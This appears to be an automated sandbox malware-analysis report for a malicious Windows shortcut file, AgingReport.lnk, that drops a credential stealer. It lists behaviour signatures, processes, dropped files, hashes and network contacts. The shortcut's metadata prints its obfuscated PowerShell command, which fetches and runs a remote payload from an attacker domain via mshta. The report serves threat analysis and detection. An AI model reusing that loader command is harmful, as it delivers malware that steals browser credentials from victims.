| download: | /Downloads/AgingReport.lnk |
| Full analysis: | https://app.any.run/tasks/56623b17-ce76-46d1-a077-92c0bfa24516 |
| Verdict: | Malicious activity |
| Threats: | Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. |
| Analysis date: | February 03, 2025, 15:12:34 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\" |
| MD5: | D9AEA0B6C153EDD6EDE3A0F68685E569 |
| SHA1: | 08DADE1E63ABB7F0DC28B24B99623232BB7CA94D |
| SHA256: | A71D997E85A60C16F0D11F73C6BA7D4105C1008AFFDFC498FBC66E410E70BB82 |
| SSDEEP: | 48:8wTX1e3ztoZcxc4rE9cLuchSh4udo9aQ1l:8wJtZcxc4rE9cL9hSa3J1l |
MALICIOUS
Changes powershell execution policy (Unrestricted)
- mshta.exe (PID: 6660)
Run PowerShell with an invisible window
- powershell.exe (PID: 6936)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 6936)
Actions looks like stealing of personal data
- Patchmon_es.exe (PID: 6620)
Steals credentials from Web Browsers
- Patchmon_es.exe (PID: 6620)
SUSPICIOUS
Executes script without checking the security policy
- powershell.exe (PID: 6936)
Executable content was dropped or overwritten
- mshta.exe (PID: 6660)
- powershell.exe (PID: 6936)
- LEKEEQZC.exe (PID: 6500)
- LEKEEQZC.exe (PID: 4980)
- LEKEEQZC.exe (PID: 3700)
- LEKEEQZC.exe (PID: 1520)
- WinX_DVD_Ripper_Platinum.exe (PID: 5592)
- cmd.exe (PID: 5160)
Probably obfuscated PowerShell command line is found
- mshta.exe (PID: 6660)
Starts POWERSHELL.EXE for commands execution
- mshta.exe (PID: 6660)
The process bypasses the loading of PowerShell profile settings
- mshta.exe (PID: 6660)
Process drops legitimate windows executable
- mshta.exe (PID: 6660)
Starts itself from another location
- LEKEEQZC.exe (PID: 4980)
- LEKEEQZC.exe (PID: 6500)
- WinX_DVD_Ripper_Platinum.exe (PID: 5592)
Starts CMD.EXE for commands execution
- WinX_DVD_Ripper_Platinum.exe (PID: 4136)
- WinX_DVD_Ripper_Platinum.exe (PID: 2928)
The executable file from the user directory is run by the CMD process
- Patchmon_es.exe (PID: 6544)
- Patchmon_es.exe (PID: 6620)
Reads the date of Windows installation
- Patchmon_es.exe (PID: 6544)
- Patchmon_es.exe (PID: 6620)
Executes application which crashes
- Patchmon_es.exe (PID: 6620)
INFO
Reads Internet Explorer settings
- mshta.exe (PID: 6660)
Checks proxy server information
- mshta.exe (PID: 6660)
- powershell.exe (PID: 6936)
- Patchmon_es.exe (PID: 6620)
- Patchmon_es.exe (PID: 6544)
The sample compiled with english language support
- mshta.exe (PID: 6660)
- powershell.exe (PID: 6936)
- LEKEEQZC.exe (PID: 4980)
- LEKEEQZC.exe (PID: 6500)
- LEKEEQZC.exe (PID: 3700)
- LEKEEQZC.exe (PID: 1520)
- WinX_DVD_Ripper_Platinum.exe (PID: 5592)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 6936)
Checks whether the specified file exists (POWERSHELL)
- powershell.exe (PID: 6936)
Checks supported languages
- LEKEEQZC.exe (PID: 4980)
- LEKEEQZC.exe (PID: 6500)
- LEKEEQZC.exe (PID: 3700)
- LEKEEQZC.exe (PID: 1520)
- WinX_DVD_Ripper_Platinum.exe (PID: 5592)
- WinX_DVD_Ripper_Platinum.exe (PID: 4136)
- WinX_DVD_Ripper_Platinum.exe (PID: 2928)
- Patchmon_es.exe (PID: 6620)
- Patchmon_es.exe (PID: 6544)
Disables trace logs
- powershell.exe (PID: 6936)
The executable file from the user directory is run by the Powershell process
- LEKEEQZC.exe (PID: 4980)
- LEKEEQZC.exe (PID: 6500)
Create files in a temporary directory
- LEKEEQZC.exe (PID: 4980)
- LEKEEQZC.exe (PID: 6500)
- LEKEEQZC.exe (PID: 3700)
- LEKEEQZC.exe (PID: 1520)
- WinX_DVD_Ripper_Platinum.exe (PID: 2928)
- WinX_DVD_Ripper_Platinum.exe (PID: 4136)
Reads the computer name
- WinX_DVD_Ripper_Platinum.exe (PID: 5592)
- WinX_DVD_Ripper_Platinum.exe (PID: 4136)
- WinX_DVD_Ripper_Platinum.exe (PID: 2928)
- Patchmon_es.exe (PID: 6544)
- Patchmon_es.exe (PID: 6620)
Creates files or folders in the user directory
- WinX_DVD_Ripper_Platinum.exe (PID: 5592)
- WinX_DVD_Ripper_Platinum.exe (PID: 4136)
Reads the machine GUID from the registry
- Patchmon_es.exe (PID: 6544)
- Patchmon_es.exe (PID: 6620)
Reads the software policy settings
- Patchmon_es.exe (PID: 6620)
- Patchmon_es.exe (PID: 6544)
Application launched itself
- msedge.exe (PID: 5836)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | 11 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | powershell.exe |
| RelativePath: | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| CommandLineArguments: | . ([char]105+[char]101+[char]120) ('m#s###h###ta### ##h#t##t#p##s###:##//li###tt###le###m###t#l###o###g#i###s###t###i###cs##.#ne##t##/##c###he#ck###-i###t#/##r##e###p##o##r###t###' -replace '#')" |
| IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
Total processes
156
Monitored processes
30
Malicious processes
3
Suspicious processes
7
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1520 | "C:\Users\admin\AppData\Local\Temp\{D9060F15-277A-47B3-837D-467B224783AA}\.cr\LEKEEQZC.exe" -burn.clean.room="C:\Users\admin\AppData\Roaming\LEKEEQZC.exe" -burn.filehandle.attached=652 -burn.filehandle.self=696 | C:\Users\admin\AppData\Local\Temp\{D9060F15-277A-47B3-837D-467B224783AA}\.cr\LEKEEQZC.exe | LEKEEQZC.exe | ||||||||||||
User: admin Company: Endomorphy Integrity Level: MEDIUM Description: Lignum Exit code: 0 Version: 0.1.3.0 Modules
| |||||||||||||||
| 1616 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4036 --field-trial-handle=2360,i,13720990868791012161,9942470404713165680,262144 --variations-seed-version /prefetch:2 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 122.0.2365.59 Modules
| |||||||||||||||
| 2632 | C:\WINDOWS\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe | — | WinX_DVD_Ripper_Platinum.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2928 | C:\Users\admin\AppData\Roaming\YVGCli\WinX_DVD_Ripper_Platinum.exe | C:\Users\admin\AppData\Roaming\YVGCli\WinX_DVD_Ripper_Platinum.exe | — | WinX_DVD_Ripper_Platinum.exe | |||||||||||
User: admin Company: Digiarty Software, Inc. Integrity Level: MEDIUM Description: WinX DVD Ripper Platinum Exit code: 1 Version: 8.22.0.246 Modules
| |||||||||||||||
| 3620 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5568 --field-trial-handle=2360,i,13720990868791012161,9942470404713165680,262144 --variations-seed-version /prefetch:8 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 7 Version: 122.0.2365.59 Modules
| |||||||||||||||
| 3688 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3700 | "C:\Users\admin\AppData\Local\Temp\{917676B8-FA6C-4406-A536-0B362A3194D5}\.cr\LEKEEQZC.exe" -burn.clean.room="C:\Users\admin\AppData\Roaming\LEKEEQZC.exe" -burn.filehandle.attached=672 -burn.filehandle.self=668 | C:\Users\admin\AppData\Local\Temp\{917676B8-FA6C-4406-A536-0B362A3194D5}\.cr\LEKEEQZC.exe | LEKEEQZC.exe | ||||||||||||
User: admin Company: Endomorphy Integrity Level: MEDIUM Description: Lignum Exit code: 0 Version: 0.1.3.0 Modules
| |||||||||||||||
| 4136 | C:\Users\admin\AppData\Local\Temp\{C5523836-B42B-41EB-8E95-C9F96C99E9C9}\.ba\WinX_DVD_Ripper_Platinum.exe | C:\Users\admin\AppData\Local\Temp\{C5523836-B42B-41EB-8E95-C9F96C99E9C9}\.ba\WinX_DVD_Ripper_Platinum.exe | — | LEKEEQZC.exe | |||||||||||
User: admin Company: Digiarty Software, Inc. Integrity Level: MEDIUM Description: WinX DVD Ripper Platinum Exit code: 1 Version: 8.22.0.246 Modules
| |||||||||||||||
| 4908 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4204 --field-trial-handle=2360,i,13720990868791012161,9942470404713165680,262144 --variations-seed-version /prefetch:8 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 122.0.2365.59 Modules
| |||||||||||||||
| 4952 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
15 621
Read events
15 604
Write events
17
Delete events
0
Modification events
| (PID) Process: | (6660) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (6660) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (6660) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (5836) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 0 | |||
| (PID) Process: | (5836) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | state |
Value: 2 | |||
| (PID) Process: | (5836) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | state |
Value: 1 | |||
| (PID) Process: | (5836) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics |
| Operation: | write | Name: | user_experience_metrics.stability.exited_cleanly |
Value: 0 | |||
| (PID) Process: | (5836) msedge.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault |
| Operation: | write | Name: | S-1-5-21-1693682860-607145093-2874071422-1001 |
Value: 51DA49A4D48B2F00 | |||
| (PID) Process: | (5836) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\262788 |
| Operation: | write | Name: | WindowTabManagerFileMappingId |
Value: {22C3709C-0F62-43D6-8D79-4522A65BDC42} | |||
| (PID) Process: | (5836) msedge.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault |
| Operation: | write | Name: | S-1-5-21-1693682860-607145093-2874071422-1001 |
Value: D61D44A4D48B2F00 | |||
Executable files
29
Suspicious files
54
Text files
34
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6660 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:E192462F281446B5D1500D474FBACC4B | SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60 | |||
| 6660 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\report[1] | executable | |
MD5:9C85EC2B20D64A082B6D2DB68E148BC3 | SHA256:1A1AF5C23959E9F0E52BBBEA1F07D702458A0949C92EF45312CAC0AEAF878D5A | |||
| 3700 | LEKEEQZC.exe | C:\Users\admin\AppData\Local\Temp\{C5523836-B42B-41EB-8E95-C9F96C99E9C9}\.ba\supine.iso | — | |
MD5:— | SHA256:— | |||
| 6348 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SXJK2TJOHMBRQ47092N3.temp | binary | |
MD5:3269693527F63356EDA1C2435CCD1C66 | SHA256:02912874D566970859A6F8D03EC6D1DACE4F7B4D087307BF309CC719726484A8 | |||
| 1520 | LEKEEQZC.exe | C:\Users\admin\AppData\Local\Temp\{31CA65C2-986E-4220-8BAC-5781339D68DC}\.ba\supine.iso | — | |
MD5:— | SHA256:— | |||
| 6348 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:7BA1E25DD5CAAAF8BCCF654BCE90F757 | SHA256:D59DF988F124E6456D69B00ADCD38806828556261D4CD07B174BD8549A596601 | |||
| 6500 | LEKEEQZC.exe | C:\Users\admin\AppData\Local\Temp\{917676B8-FA6C-4406-A536-0B362A3194D5}\.cr\LEKEEQZC.exe | executable | |
MD5:24E9D4248E1A0AB100E2D1E1FC923EB3 | SHA256:594EAB0C91DBA4364141B6578BE8301EA2811936A1C4AAA5B2CC9027D7015454 | |||
| 1520 | LEKEEQZC.exe | C:\Users\admin\AppData\Local\Temp\{31CA65C2-986E-4220-8BAC-5781339D68DC}\.ba\lifeline.ai | binary | |
MD5:5670751B3CF871D0BE6F556D603F85B9 | SHA256:2C4F8BA3B76730619C4C15B1C6715DC0D715B6094A004270691117769CB2AC67 | |||
| 3700 | LEKEEQZC.exe | C:\Users\admin\AppData\Local\Temp\{C5523836-B42B-41EB-8E95-C9F96C99E9C9}\.ba\libeay32.dll | executable | |
MD5:73A8CDC0BB5B95C1BA6DEB39D71F0349 | SHA256:639980C48DD692E9FF3144F3D932AA07E501F12197D587EC47EB5EC8F6B7696A | |||
| 6936 | powershell.exe | C:\Users\admin\AppData\Roaming\LEKEEQZC.exe | executable | |
MD5:849F2BE260E121C29C460381D8E137E6 | SHA256:D7B1019D6A0DD616A6B7EC52B08F0878A18F4D2B53CC55FBEF5D6E3D7D774A66 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
40
TCP/UDP connections
130
DNS requests
108
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5064 | SearchApp.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.200.189.225:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6660 | mshta.exe | GET | 200 | 23.220.113.51:80 | http://x1.c.lencr.org/ | unknown | — | — | whitelisted |
2292 | svchost.exe | GET | 200 | 23.200.189.225:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 206 | 151.101.38.172:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1738685727&P2=404&P3=2&P4=Tr%2faHDfmodPgukGdrpE8gv6KOvN9WwaRswnzeTJqig4%2b02xHtn473zAmj7TI5UGHkJMHbwevA9SCAuq1Y3p2Eg%3d%3d | unknown | — | — | whitelisted |
— | — | GET | 206 | 151.101.38.172:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1738685727&P2=404&P3=2&P4=Tr%2faHDfmodPgukGdrpE8gv6KOvN9WwaRswnzeTJqig4%2b02xHtn473zAmj7TI5UGHkJMHbwevA9SCAuq1Y3p2Eg%3d%3d | unknown | — | — | whitelisted |
— | — | GET | 206 | 151.101.38.172:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1738685727&P2=404&P3=2&P4=Tr%2faHDfmodPgukGdrpE8gv6KOvN9WwaRswnzeTJqig4%2b02xHtn473zAmj7TI5UGHkJMHbwevA9SCAuq1Y3p2Eg%3d%3d | unknown | — | — | whitelisted |
— | — | GET | 206 | 151.101.38.172:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1738685727&P2=404&P3=2&P4=Tr%2faHDfmodPgukGdrpE8gv6KOvN9WwaRswnzeTJqig4%2b02xHtn473zAmj7TI5UGHkJMHbwevA9SCAuq1Y3p2Eg%3d%3d | unknown | — | — | whitelisted |
— | — | GET | 206 | 151.101.38.172:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1738685727&P2=404&P3=2&P4=Tr%2faHDfmodPgukGdrpE8gv6KOvN9WwaRswnzeTJqig4%2b02xHtn473zAmj7TI5UGHkJMHbwevA9SCAuq1Y3p2Eg%3d%3d | unknown | — | — | whitelisted |
— | — | HEAD | 200 | 151.101.38.172:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/fb6dd03b-99d7-4cc8-a878-91c8e655c2d3?P1=1738685727&P2=404&P3=2&P4=a%2fSJTWL1hAkZIWtQhn%2fFhXXeg8ps6asMza%2blJ1QTrbcP7fHVDbunRFv3LNIebcOfsXcI%2bVrKtQ1Jm9juRNSAEg%3d%3d | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2292 | svchost.exe | 23.200.189.225:80 | www.microsoft.com | Moratelindo Internet Exchange Point | ID | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.200.189.225:80 | www.microsoft.com | Moratelindo Internet Exchange Point | ID | whitelisted |
— | — | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 104.126.37.154:443 | — | Akamai International B.V. | DE | unknown |
5064 | SearchApp.exe | 23.210.215.8:443 | www.bing.com | Akamai International B.V. | TW | whitelisted |
5064 | SearchApp.exe | 2.23.77.188:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2292 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6660 | mshta.exe | 216.107.136.186:443 | littlemtlogistics.net | Canopus It Solutions Pvt Ltd | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
littlemtlogistics.net |
| unknown |
ocsp.digicert.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
x1.c.lencr.org |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
bapakopla.live |
| unknown |
config.edge.skype.com |
| whitelisted |
ntp.msn.com |
| whitelisted |